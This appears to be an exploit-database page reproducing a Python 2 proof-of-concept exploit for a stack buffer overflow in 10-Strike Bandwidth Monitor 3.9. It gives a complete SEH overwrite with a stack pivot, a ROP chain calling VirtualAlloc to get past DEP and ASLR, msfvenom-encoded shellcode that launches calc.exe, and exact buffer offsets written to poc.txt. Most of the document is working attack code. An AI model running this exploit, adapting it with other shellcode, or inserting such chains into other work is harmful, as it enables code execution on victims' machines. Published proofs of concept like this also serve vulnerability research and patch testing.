





10-Strike Bandwidth Monitor 3.9 Buffer Overflow

CVE Category Price Severity
CVE-2007-1911 CWE-119 $5,000 High
Author Risk Exploitation Type Date
Anonymous Critical Remote 2020-06-08
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N 0.0211 0.3452

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020060035

Below is a copy:

10-Strike Bandwidth Monitor 3.9 Buffer Overflow
# Exploit Title: 10-Strike Bandwidth Monitor 3.9 - ROP VirtualAlloc - Buffer Overflow (SEH,DEP,ASLR)
# Exploit Author: Bobby Cooke
# Date: June 7th, 2020
# Vendor Site: https://www.10-strike.com/
# Software Download: https://www.10-strike.com/bandwidth-monitor/bandwidth-monitor.exe
# Tested On: Windows 10 - Pro 1909 (x86)
# Version: version 3.9
# Exploit Details:
#   1. Bypass SafeSEH by overwriting the Structured Exception Handler (SEH) with a Stack-Pivot return address located in the [BandMonitor.exe] memory-space; as it was not compiled with the SafeSEH Protection.
#   2. The Stack-Pivot will land in a RET Sled; as the process's offset on the Stack is different every time.
#     - StackPivot lands at a different offset, 1:660; 2:644; 3:676; 4:692; 5:696; 6:688; 7:692
#   3. Bypass Address Space Layout Randomization (ASLR) & Data Execution Prevention (DEP) using Return-Oriented Programming (ROP), choosing Gadgets from the [ssleay32.dll], [BandMonitor.exe], and [LIBEAY32.dll]; as they are not compiled with Rebase or ASLR.
#   4. A pointer to the VirtualAlloc symbol exists in the import table of the [LIBEAY32.dll] module. Use Gadgets to call VirtualAlloc and Bypass DEP.
#   5. Pass execution to shellcode and PopCalc.
#   - Bad Characters: \x00 => \x20 ; \x0D & \x0A => Truncates buffer
# Recreate:
#   Turn On DEP: This PC > Properties > Advanced System Settings > Advanced > Performance > Settings > Data Execution Prevention > "Turn on DEP for all programs and services except those I select:" > OK > Restart
#   Install > Run Exploit > Copy buffer from poc.txt > Start BandMonitor > Help > Enter Reg Key > Paste > Exploit

# Base       | Top        | Rebase | SafeSEH | ASLR  | NXCompat | OS Dll | Modulename
# -------------------------------------------------------------------------------------------
# 0x12000000 | 0x12057000 | False  | True    | False |  False   | False  | [ssleay32.dll]
# 0x00400000 | 0x01247000 | False  | False   | False |  False   | False  | [BandMonitor.exe]
# 0x11000000 | 0x11155000 | False  | True    | False |  False   | False  | [LIBEAY32.dll]
# -------------------------------------------------------------------------------------------

import struct
# Leading filler; it is the first component of the PoC buffer, directly
# ahead of the RET sled ('A' is byte 0x41).
OS_retSled = 'A' * 400
# 0x11060124 (retn in [LIBEAY32.dll], PAGE_EXECUTE_READ) written little-endian;
# repeated 100 times because the pivot lands at a varying offset in the sled.
_ret_gadget = '\x24\x01\x06\x11'
retSled    = _ret_gadget * 100

# EAX 110E7198 <&KERNEL32.VirtualAlloc>
# ECX 00000040
# EDX 00001000
# EBX 00000001
# ESP 0014EAA4
# EBP 1202EF02 ssleay32.1202EF02
# ESI 110495EF LIBEAY32.110495EF
# EDI 01225803 BandMoni.01225803
# EIP 76C647D0 KERNEL32.VirtualAlloc

# 0014EAA0   110495EF  ....  LIBEAY32.110495EF
# 0014EAA4   1202EF02  ....  /CALL to VirtualAlloc
# 0014EAA8   0014EABC  ....  |Address = 0014EABC
# 0014EAAC   00000001  ....  |Size = 1
# 0014EAB0   00001000  ....  |AllocationType = MEM_COMMIT
# 0014EAB4   00000040  @...  \Protect = PAGE_EXECUTE_READWRITE
# 0014EAB8   110E7198  .q..  <&KERNEL32.VirtualAlloc>
# 0014EABC   110843B4  .C..  LIBEAY32.110843B4
# 0014EAC0   90909090  ....

def createRopChain():
    """Return the ROP chain as a string of packed little-endian DWORDs.

    The gadget addresses are the mona.py (www.corelan.be) output, unchanged
    and in the same order as the generated flat list; they are only grouped
    here by the register each run sets up.  The final entries load the IAT
    pointer to VirtualAlloc and PUSHAD the prepared registers onto the stack.

    NOTE(review): ''.join over struct.pack() output only works on Python 2,
    where str is bytes; the rest of this script (print statements) is
    Python 2 as well.
    """
    dword = struct.Struct('<I').pack

    set_ebp = [
        0x1202ef02,  # POP EBP # RETN [ssleay32.dll]
        0x1202ef02,  # skip 4 bytes [ssleay32.dll]
    ]
    set_ebx = [
        0x01215f16,  # POP EBX # RETN [BandMonitor.exe]
        0xffffffff,
        0x012175f5,  # INC EBX # RETN [BandMonitor.exe]
        0x01056ff7,  # INC EBX # RETN [BandMonitor.exe]
    ]
    set_edx = [
        0x011e94d4,  # POP EDX # RETN [BandMonitor.exe]
        0xffffefff,  # Value to negate, destination value : 0x00001000
        0x01218952,  # NEG EDX # RETN [BandMonitor.exe]
        0x011ead1b,  # DEC EDX # RETN [BandMonitor.exe]
    ]
    # POP ECX with -1, then 65 INC ECX gadgets: one at 0x11016023 followed
    # by 64 at 0x1101597d -- the same count as the original flat list.
    set_ecx = [
        0x110c5b5e,  # POP ECX # RETN [LIBEAY32.dll]
        0xffffffff,
        0x11016023,  # INC ECX # RETN [LIBEAY32.dll]
    ] + [0x1101597d] * 64  # INC ECX # RETN [LIBEAY32.dll]
    call_setup = [
        0x1202fe55,  # POP EDI # RETN [ssleay32.dll]
        0x01225803,  # RETN (ROP NOP) [BandMonitor.exe]
        0x1105ed16,  # POP ESI # RETN [LIBEAY32.dll]
        0x110495ef,  # JMP [EAX] [LIBEAY32.dll]
        0x012126f5,  # POP EAX # RETN [BandMonitor.exe]
        0x110e7198,  # ptr to &VirtualAlloc() [IAT LIBEAY32.dll]
        0x110762c4,  # PUSHAD # RETN [LIBEAY32.dll]
        0x110843b4,  # ptr to 'push esp # ret ' [LIBEAY32.dll]
    ]

    packed = []
    for gadget in set_ebp + set_ebx + set_edx + set_ecx + call_setup:
        packed.append(dword(gadget))
    return ''.join(packed)
# Packed VirtualAlloc ROP chain (see createRopChain) and the 100-byte NOP
# sled that sits between the chain and the shellcode in the final buffer.
ropChain = createRopChain()
nopSled  = chr(0x90) * 100
# boku@kali# msfvenom -p windows/exec CMD='calc.exe' -b '\x00\x0d\x0a' -v shellcode -a x86 -f python --platform windows
# x86/shikata_ga_nai chosen with final size 220
# Encoded payload emitted by the msfvenom command quoted above
# (x86/shikata_ga_nai, 220 bytes = 20 rows x 11 bytes). The bytes are taken
# verbatim from that output and are not decoded or audited here.
shellcode =  b""
shellcode += b"\xbf\xd2\xa1\xc4\xd3\xda\xdb\xd9\x74\x24\xf4"
shellcode += b"\x5e\x31\xc9\xb1\x31\x83\xc6\x04\x31\x7e\x0f"
shellcode += b"\x03\x7e\xdd\x43\x31\x2f\x09\x01\xba\xd0\xc9"
shellcode += b"\x66\x32\x35\xf8\xa6\x20\x3d\xaa\x16\x22\x13"
shellcode += b"\x46\xdc\x66\x80\xdd\x90\xae\xa7\x56\x1e\x89"
shellcode += b"\x86\x67\x33\xe9\x89\xeb\x4e\x3e\x6a\xd2\x80"
shellcode += b"\x33\x6b\x13\xfc\xbe\x39\xcc\x8a\x6d\xae\x79"
shellcode += b"\xc6\xad\x45\x31\xc6\xb5\xba\x81\xe9\x94\x6c"
shellcode += b"\x9a\xb3\x36\x8e\x4f\xc8\x7e\x88\x8c\xf5\xc9"
shellcode += b"\x23\x66\x81\xcb\xe5\xb7\x6a\x67\xc8\x78\x99"
shellcode += b"\x79\x0c\xbe\x42\x0c\x64\xbd\xff\x17\xb3\xbc"
shellcode += b"\xdb\x92\x20\x66\xaf\x05\x8d\x97\x7c\xd3\x46"
shellcode += b"\x9b\xc9\x97\x01\xbf\xcc\x74\x3a\xbb\x45\x7b"
shellcode += b"\xed\x4a\x1d\x58\x29\x17\xc5\xc1\x68\xfd\xa8"
shellcode += b"\xfe\x6b\x5e\x14\x5b\xe7\x72\x41\xd6\xaa\x18"
shellcode += b"\x94\x64\xd1\x6e\x96\x76\xda\xde\xff\x47\x51"
shellcode += b"\xb1\x78\x58\xb0\xf6\x77\x12\x99\x5e\x10\xfb"
shellcode += b"\x4b\xe3\x7d\xfc\xa1\x27\x78\x7f\x40\xd7\x7f"
shellcode += b"\x9f\x21\xd2\xc4\x27\xd9\xae\x55\xc2\xdd\x1d"
shellcode += b"\x55\xc7\xbd\xc0\xc5\x8b\x6f\x67\x6e\x29\x70"

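# Filler between the shellcode and the SEH record. The 4188/600/200 figures
# are the author's measured layout constants and are kept verbatim; the
# lengths are summed instead of concatenating the three parts just to
# measure them.
OS_nSEH    = '\x43' * (4188 - 600 - 200 - (len(ropChain) + len(nopSled) + len(shellcode)))
nSEH       = '\x44' * 4
# Stack pivot offset to controllable buffer: 1408 (0x580) bytes
SEH        = '\x70\x28\x21\x01'  # 0x01212870 : {pivot 2064 / 0x810}
extra      = '\x44' * 2000
# Buffer layout, left to right, exactly as written to the PoC file.
buffer  = OS_retSled + retSled + ropChain + nopSled + shellcode + OS_nSEH + nSEH + SEH + extra
File    = 'poc.txt'
payload = buffer
try:
    # 'with' closes the handle even when write() raises; the previous
    # open/write/close sequence left it open on a failed write.
    with open(File, 'w') as f:
        f.write(payload)
except (IOError, OSError):
    # Only file-system errors are reported as "failed to create"; anything
    # else (e.g. a wrong payload type) propagates instead of being hidden
    # by a bare except.
    print(File + ' failed to create')
else:
    print(File + " created successfully")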
